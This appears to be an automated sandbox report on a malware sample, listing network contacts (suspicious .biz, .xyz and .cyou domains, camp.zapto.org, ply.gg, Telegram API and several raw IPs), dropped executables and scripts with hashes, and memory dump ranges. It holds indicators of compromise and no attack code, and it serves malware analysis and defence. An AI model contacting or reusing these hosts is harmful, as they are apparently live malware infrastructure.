US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 jrqh-hk.com udp
CN 123.136.92.99:80 jrqh-hk.com tcp
US 8.8.8.8:53 immureprech.biz udp
US 172.67.207.38:443 immureprech.biz tcp
US 8.8.8.8:53 116.143.67.172.in-addr.arpa udp
US 8.8.8.8:53 deafeninggeh.biz udp
US 104.21.16.1:443 deafeninggeh.biz tcp
US 8.8.8.8:53 effecterectz.xyz udp
US 8.8.8.8:53 diffuculttan.xyz udp
US 8.8.8.8:53 debonairnukk.xyz udp
US 8.8.8.8:53 wrathful-jammy.cyou udp
US 104.21.74.196:443 wrathful-jammy.cyou tcp
US 8.8.8.8:53 38.207.67.172.in-addr.arpa udp
US 8.8.8.8:53 99.92.136.123.in-addr.arpa udp
US 8.8.8.8:53 1.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 196.74.21.104.in-addr.arpa udp
US 8.8.8.8:53 sordid-snaked.cyou udp
US 172.67.141.195:443 sordid-snaked.cyou tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
US 8.8.8.8:53 195.141.67.172.in-addr.arpa udp
US 8.8.8.8:53 254.238.217.23.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 updates.signiant.com udp
DE 13.32.121.112:80 updates.signiant.com tcp
US 8.8.8.8:53 112.121.32.13.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 www.hootech.com udp
US 107.191.125.184:80 www.hootech.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 portals.mediashuttle.com udp
US 76.223.25.251:443 portals.mediashuttle.com tcp
US 8.8.8.8:53 184.125.191.107.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 251.25.223.76.in-addr.arpa udp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 ship-amongst.gl.at.ply.gg udp
US 147.185.221.24:14429 ship-amongst.gl.at.ply.gg tcp
US 8.8.8.8:53 24.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
RU 31.41.244.10:80 31.41.244.10 tcp
US 76.223.25.251:443 portals.mediashuttle.com tcp
US 76.223.25.251:443 portals.mediashuttle.com tcp
US 76.223.25.251:443 portals.mediashuttle.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 webcdn.triongames.com udp
GB 2.19.117.97:80 webcdn.triongames.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 97.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 147.68.81.185.in-addr.arpa udp
DE 87.120.84.32:80 87.120.84.32 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
BG 195.230.23.72:8085 195.230.23.72 tcp
US 8.8.8.8:53 32.84.120.87.in-addr.arpa udp
RU 185.81.68.147:1912 tcp
US 8.8.8.8:53 72.23.230.195.in-addr.arpa udp
US 8.8.8.8:53 get.geojs.io udp
US 172.67.70.233:443 get.geojs.io tcp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 233.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
DE 94.156.177.133:7000 tcp
US 154.216.17.90:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 133.177.156.94.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 boot-01.net.anydesk.com udp
DE 195.181.174.173:443 boot-01.net.anydesk.com tcp
US 8.8.8.8:53 relay-ad195ac5.net.anydesk.com udp
GB 57.128.141.163:80 relay-ad195ac5.net.anydesk.com tcp
US 8.8.8.8:53 173.174.181.195.in-addr.arpa udp
US 8.8.8.8:53 163.141.128.57.in-addr.arpa udp
US 8.8.8.8:53 api.playanext.com udp
DE 18.245.86.26:80 api.playanext.com tcp
US 8.8.8.8:53 26.86.245.18.in-addr.arpa udp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
TH 165.154.184.75:80 165.154.184.75 tcp
US 8.8.8.8:53 boot.net.anydesk.com udp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
DE 57.129.37.75:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-79bdf984.net.anydesk.com udp
GB 195.181.165.153:443 relay-79bdf984.net.anydesk.com tcp
US 8.8.8.8:53 75.37.129.57.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 153.165.181.195.in-addr.arpa udp
US 8.8.8.8:53 18.102.255.239.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 gstatic.com udp
FR 142.250.75.227:443 gstatic.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
TH 165.154.184.75:80 165.154.184.75 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 www.grupodulcemar.pe udp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
HK 47.244.167.171:801 tcp
US 8.8.8.8:53 171.167.244.47.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:3678 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:3678 tcp
US 192.210.150.26:3678 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:3678 tcp
BG 195.230.23.72:80 tcp

Files

memory/3588-0-0x00007FFCD9873000-0x00007FFCD9875000-memory.dmp

memory/3588-1-0x00000000005E0000-0x00000000005E8000-memory.dmp

memory/3588-2-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp

memory/3588-3-0x00007FFCD9873000-0x00007FFCD9875000-memory.dmp

memory/3588-4-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\random.exe

MD5 3a425626cbd40345f5b8dddd6b2b9efa
SHA1 7b50e108e293e54c15dce816552356f424eea97a
SHA256 ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1
SHA512 a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

C:\Users\Admin\AppData\Local\Temp\a\u1w30Wt.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\AppData\Local\Temp\a\client.exe

MD5 52a3c7712a84a0f17e9602828bf2e86d
SHA1 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2
SHA256 afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288
SHA512 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac

memory/876-36-0x0000026D73F30000-0x0000026D73F48000-memory.dmp

memory/876-37-0x0000026D765C0000-0x0000026D76782000-memory.dmp

memory/876-38-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp

memory/876-39-0x0000026D76DC0000-0x0000026D772E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 3626532127e3066df98e34c3d56a1869
SHA1 5fa7102f02615afde4efd4ed091744e842c63f78
SHA256 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca
SHA512 dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 045b0a3d5be6f10ddf19ae6d92dfdd70
SHA1 0387715b6681d7097d372cd0005b664f76c933c7
SHA256 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d
SHA512 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

MD5 cea368fc334a9aec1ecff4b15612e5b0
SHA1 493d23f72731bb570d904014ffdacbba2334ce26
SHA256 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541
SHA512 bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 0dc4014facf82aa027904c1be1d403c1
SHA1 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831
SHA256 a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7
SHA512 cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 b7d1e04629bec112923446fda5391731
SHA1 814055286f963ddaa5bf3019821cb8a565b56cb8
SHA256 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789
SHA512 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 7187cc2643affab4ca29d92251c96dee
SHA1 ab0a4de90a14551834e12bb2c8c6b9ee517acaf4
SHA256 c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830
SHA512 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 5eb39ba3698c99891a6b6eb036cfb653
SHA1 d2f1cdd59669f006a2f1aa9214aeed48bc88c06e
SHA256 e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2
SHA512 6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 5404286ec7853897b3ba00adf824d6c1
SHA1 39e543e08b34311b82f6e909e1e67e2f4afec551
SHA256 ec94a6666a3103ba6be60b92e843075a2d7fe7d30fa41099c3f3b1e2a5eba266
SHA512 c4b78298c42148d393feea6c3941c48def7c92ef0e6baac99144b083937d0a80d3c15bd9a0bf40daa60919968b120d62999fa61af320e507f7e99fbfe9b9ef30

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 5659eba6a774f9d5322f249ad989114a
SHA1 4bfb12aa98a1dc2206baa0ac611877b815810e4c
SHA256 e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4
SHA512 f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 579a63bebccbacab8f14132f9fc31b89
SHA1 fca8a51077d352741a9c1ff8a493064ef5052f27
SHA256 0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0
SHA512 4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f

memory/2924-110-0x00007FF71BDE0000-0x00007FF71C270000-memory.dmp

memory/2924-108-0x00007FF71BDE0000-0x00007FF71C270000-memory.dmp

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

MD5 83d75087c9bf6e4f07c36e550731ccde
SHA1 d5ff596961cce5f03f842cfd8f27dde6f124e3ae
SHA256 46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f
SHA512 044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

MD5 d68f79c459ee4ae03b76fa5ba151a41f
SHA1 bfa641085d59d58993ba98ac9ee376f898ee5f7b
SHA256 aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6
SHA512 bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e

C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe

MD5 63c4e3f9c7383d039ab4af449372c17f
SHA1 f52ff760a098a006c41269ff73abb633b811f18e
SHA256 151524f6c1d1aeac530cfd69de15c3336043dc8eb3f5aeaa31513e24bfd7acdd
SHA512 dcfb4804c5569ad13e752270d13320f8769601b7092544741e35bc62a22af363b7a5ea7c5a65132c9575540a3e689a6946110502bd0f046385b8739e81761fbf

C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\select.pyd

MD5 7c14c7bc02e47d5c8158383cb7e14124
SHA1 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
SHA256 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
SHA512 af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\_socket.pyd

MD5 69801d1a0809c52db984602ca2653541
SHA1 0f6e77086f049a7c12880829de051dcbe3d66764
SHA256 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3
SHA512 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

memory/876-154-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

MD5 12c766cab30c7a0ef110f0199beda18b
SHA1 efdc8eb63df5aae563c7153c3bd607812debeba4
SHA256 7b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316
SHA512 32cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

MD5 258fbac30b692b9c6dc7037fc8d371f4
SHA1 ec2daa22663bd50b63316f1df0b24bdcf203f2d9
SHA256 1c1cc887675c501201f7074794a443c3eb56bcd3d25980e4ef65e9b69d44c427
SHA512 9a4a810cf5c9232762149e8ec4677da7d4a58835174e504614d7aea09926ab084b574dab85c060fa2306e3423112c29455806d6c32db86e401573eb3f24ce0e4

memory/4984-182-0x0000000000920000-0x0000000000B90000-memory.dmp

memory/4984-183-0x0000000005530000-0x00000000055CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

MD5 3567cb15156760b2f111512ffdbc1451
SHA1 2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
SHA512 e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

MD5 2a78ce9f3872f5e591d643459cabe476
SHA1 9ac947dfc71a868bc9c2eb2bd78dfb433067682e
SHA256 21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae
SHA512 03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

memory/908-220-0x0000000000400000-0x00000000007BD000-memory.dmp

C:\Program Files\Windows Media Player\graph\graph.exe

MD5 7d254439af7b1caaa765420bea7fbd3f
SHA1 7bd1d979de4a86cb0d8c2ad9e1945bd351339ad0
SHA256 d6e7ceb5b05634efbd06c3e28233e92f1bd362a36473688fbaf952504b76d394
SHA512 c3164b2f09dc914066201562be6483f61d3c368675ac5d3466c2d5b754813b8b23fd09af86b1f15ab8cc91be8a52b3488323e7a65198e5b104f9c635ec5ed5cc

memory/908-262-0x0000000002400000-0x0000000002479000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\KillDuplicate.cmd

MD5 68cecdf24aa2fd011ece466f00ef8450
SHA1 2f859046187e0d5286d0566fac590b1836f6e1b7
SHA256 64929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770
SHA512 471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

MD5 3b8b3018e3283830627249d26305419d
SHA1 40fa5ef5594f9e32810c023aba5b6b8cea82f680
SHA256 258e444e78225f74d47ba4698d49a33e6d1f6ed1f3f710186be426078e2bf1cb
SHA512 2e9a42e53406446b503f150abfa16b994ee34211830d14ccbfbf52d86019dc5cca95c40222e5c6aed910c90988f999560ff972c575f9c207d7834abba6f04aa0

memory/1532-282-0x0000000000400000-0x0000000000A9C000-memory.dmp

memory/908-286-0x0000000002400000-0x0000000002479000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

MD5 c5ad2e085a9ff5c605572215c40029e1
SHA1 252fe2d36d552bcf8752be2bdd62eb7711d3b2ab
SHA256 47c8723d2034a43fb63f89e2bcd731c99c1c316b238957720c761a0301202e05
SHA512 8878a0f2678908136158f3a6d88393e6831dfe1e64aa82adbb17c26b223381d5ac166dc241bedd554c8dd4e687e9bee624a91fbe3d2976ddfea1d811bf26f6d4

memory/5040-296-0x0000000000F70000-0x000000000108A000-memory.dmp

memory/5040-297-0x00000000059C0000-0x0000000005ADA000-memory.dmp

memory/5040-307-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-336-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-356-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-354-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-352-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-350-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-348-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-346-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-344-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-342-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-340-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-338-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-334-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-332-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-328-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-326-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-324-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-322-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-320-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-318-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-313-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-330-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-316-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-311-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-309-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-305-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-303-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-301-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-299-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/5040-298-0x00000000059C0000-0x0000000005AD3000-memory.dmp

memory/4984-1117-0x0000000005EF0000-0x0000000006494000-memory.dmp

memory/4984-1237-0x0000000005450000-0x0000000005472000-memory.dmp

memory/4984-1116-0x00000000057D0000-0x0000000005930000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

MD5 5950611ed70f90b758610609e2aee8e6
SHA1 798588341c108850c79da309be33495faf2f3246
SHA256 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
SHA512 7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80

memory/5040-1491-0x0000000005950000-0x000000000599C000-memory.dmp

memory/5040-1490-0x0000000005AF0000-0x0000000005B7A000-memory.dmp

memory/6044-1529-0x00007FF7653D0000-0x00007FF765860000-memory.dmp

memory/6044-1527-0x00007FF7653D0000-0x00007FF765860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kd5rm1cn.hk5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4380-1535-0x000002A3F8DB0000-0x000002A3F8DD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe

MD5 f8d528a37993ed91d2496bab9fc734d3
SHA1 4b66b225298f776e21f566b758f3897d20b23cad
SHA256 bc8458a8d78cf91129c84b153aafe8319410aacb8e14aec506897c8e0793ba02
SHA512 75dc1bbb1388f68d121bab26fc7f6bf9dc1226417ad7ed4a7b9718999aa0f9c891fed0db3c9ea6d6ccb34288cc848dc44b20ea83a30afd4ea2e99cff51f30f5a

memory/4436-1546-0x00000000000F0000-0x000000000086B000-memory.dmp

memory/1532-1548-0x0000000000400000-0x0000000000A9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

MD5 58f824a8f6a71da8e9a1acc97fc26d52
SHA1 b0e199e6f85626edebbecd13609a011cf953df69
SHA256 5e5b808ed64c4f40e07a4894e1da294e364383f0a51adb7ec8c7568afba3eb17
SHA512 7d6c752369ea83bad34873d8603c413e9372ff66adcaad11e7f23d3ce85827e057444b30eadf927329191825aef4dc37a1e68c30b71fae4ce6f53708102fb461

memory/404-1565-0x0000000000F20000-0x0000000001396000-memory.dmp

memory/404-1566-0x0000000000F20000-0x0000000001396000-memory.dmp

memory/404-1567-0x0000000000F20000-0x0000000001396000-memory.dmp

memory/4436-1568-0x00000000000F0000-0x000000000086B000-memory.dmp

memory/404-1572-0x0000000000F20000-0x0000000001396000-memory.dmp

memory/5040-1573-0x0000000005C30000-0x0000000005C84000-memory.dmp

memory/5780-2775-0x0000000004FF0000-0x0000000005026000-memory.dmp

memory/5780-2776-0x00000000057E0000-0x0000000005E08000-memory.dmp

memory/5780-2778-0x0000000005F00000-0x0000000005F66000-memory.dmp

memory/5780-2779-0x0000000005F70000-0x0000000005FD6000-memory.dmp

memory/5780-2777-0x0000000005700000-0x0000000005722000-memory.dmp

memory/5780-2789-0x0000000005FE0000-0x0000000006334000-memory.dmp

memory/5780-2791-0x00000000065C0000-0x00000000065DE000-memory.dmp

memory/5780-2792-0x0000000006630000-0x000000000667C000-memory.dmp

memory/5780-2794-0x0000000071A50000-0x0000000071A9C000-memory.dmp

memory/5780-2793-0x0000000007550000-0x0000000007582000-memory.dmp

memory/5780-2805-0x00000000075A0000-0x0000000007643000-memory.dmp

memory/5780-2804-0x0000000007530000-0x000000000754E000-memory.dmp

memory/5780-2807-0x00000000078E0000-0x00000000078FA000-memory.dmp

memory/5780-2806-0x0000000007F20000-0x000000000859A000-memory.dmp

